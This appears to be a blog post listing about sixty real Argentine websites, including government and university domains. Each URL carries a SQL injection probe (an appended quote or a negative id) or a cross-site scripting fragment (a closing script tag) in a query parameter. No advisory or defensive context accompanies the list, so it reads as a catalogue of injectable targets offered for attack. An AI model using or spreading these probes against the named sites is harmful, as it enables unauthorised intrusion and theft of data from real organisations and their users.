http://peugeotglamour.com.ar/index.p..._vehiculo=%271
http://pranger.lexsoul.com.ar/glae/?pageNum_Lista=-1
http://relacionarte.com.ar/stats/sea...3C%2Fscript%3E
http://soporte.714.com.ar/faqs/article.php?id=100%27
http://zephia.com.ar/index.php?put=trabajos&ls=-11441
http://www.aestrenar.com.ar/busqueda...geNum_rst=8%27
http://www.andigital.com.ar/noticia....-2208988800000
http://www.aranibe.com.ar/scAdd.proc...oductoID=%2718
http://www.azsanitarios.com.ar/index...ath=%27370_332
http://www.barcelo.edu.ar/noticias.php?t=3%27
http://www.bc-plan-rombo.com.ar/planes.php?mod=98%27
http://www.byt-argentina.com.ar/turi...tour_id=%27684
http://www.cadenaintegracion.com.ar/....php?cod=33%27
http://www.carolinaquintana.com.ar/w...SWE_ID_1=69%27
http://www.ccab.com.ar/eventos_listado.php?sel=%271
http://www.ceramisursa.com.ar/system...id_prod=129%27
http://www.cha.org.ar/articulo.php?art=333%27
http://www.cientovolando.com.ar/fich...temporada=6%27
http://www.cimero.org.ar/verrevista.php?imp=1%27
http://www.clasificados-gratis.com.a...teid&offset=-9
http://www.coraminalenceria.com.ar/p...ategoria=11%27
http://www.corojuveniladrogue.com.ar...304&NumLow=-30
http://www.duoguefiltefish.com.ar/li...p?pagina=%2716
http://www.eileenpasteleria.com.ar/N....php?Nota=2%27
http://www.eleco.com.ar/index.php?ac...3C%2Fscript%3E
http://www.elshowdequilmes.com.ar/no...3C%2Fscript%3E
http://www.elgrafico.com.ar/blog_det...id_post=463%27
http://www.excongroup.com.ar/noticia...ed=rss2&p=6%27
http://www.expresodeoriente.com.ar/o...ilter_id=93%27
http://www.gatosyratonesweb.com.ar/t...403e1bba711101
http://www.griffinonline.com.ar/inde...roductos&ls=-3
http://www.guiaalojamiento.com.ar/index.php?id=1457%27
http://www.hitravel.com.ar/region.php?idioma=1%27
http://www.iiete.unl.edu.ar/index.php?ver_noticia=33%27
http://www.invercar.com.ar/?web=detalle&id=%271
http://www.izuzquiza.com.ar/search.p...3C%2Fscript%3E
http://www.lacumbre.gov.ar/index.php...icio-amp&id=-1
http://www.lalocacion.com.ar/www/Res...L297&rsPage=-1
http://www.lapridahogar.com.ar/index...-amp&id=514%27
http://www.loscachilos.com.ar/?q=tax...2F13&page=2%27
http://www.luceroinmobiliaria.com.ar....php?id=129%27
http://www.lugecon.com.ar/index.php?...ades-amp&id=18'
http://www.mihran-alfombras.com.ar/a...=6&s=2&f=%2718
http://www.packgroup.com.ar/Novedades.php?Codigo=%2714
http://www.pcr.org.ar/seccion.php?id_nota=%273269
http://www.periodicoeldisco.com.ar/i...cion_id=108%27
http://www.pianosdelsur.com.ar/index...allep&id=30%27
http://www.planetamama.com.ar/node?page=5%27
http://www.plee.com.ar/templates.php...3C%2Fscript%3E
http://www.portapropiedades.com.ar/s...&id_aviso=3%27
http://www.princesscruceros.com.ar/a...3C%2Fscript%3E
http://www.rflex.com.ar/web_ingles/c...o.php?pag=-988
http://www.ricoh.com.ar/pro_fam.php?id=4%27
http://www.royaltecsrl.com.ar/produc..._marca&db=2%27
http://www.rubinzal.com.ar/libro_nue...b.php?id=-3428
http://www.sisto.com.ar/?feed=rss2&p=58%27
http://www.stationcaribe.com.ar/prog...prog&id=124%27
http://www.stationtravel.com.ar/destino.php?id=152%27
http://www.tagleweb.com.ar/nissan/fi...modelo_id=%271
http://www.terragno.org.ar/vernota.php?id_nota=984%27
http://www.vanesa-inmuebles.com.ar/d...s.php?id=16%27
http://www.villacarlospaz.com.ar/ind...ar_web=%275558
http://www.vivirjuntos.encuentro.gov...ation&cat=%271

Tidak ada komentar:

Posting Komentar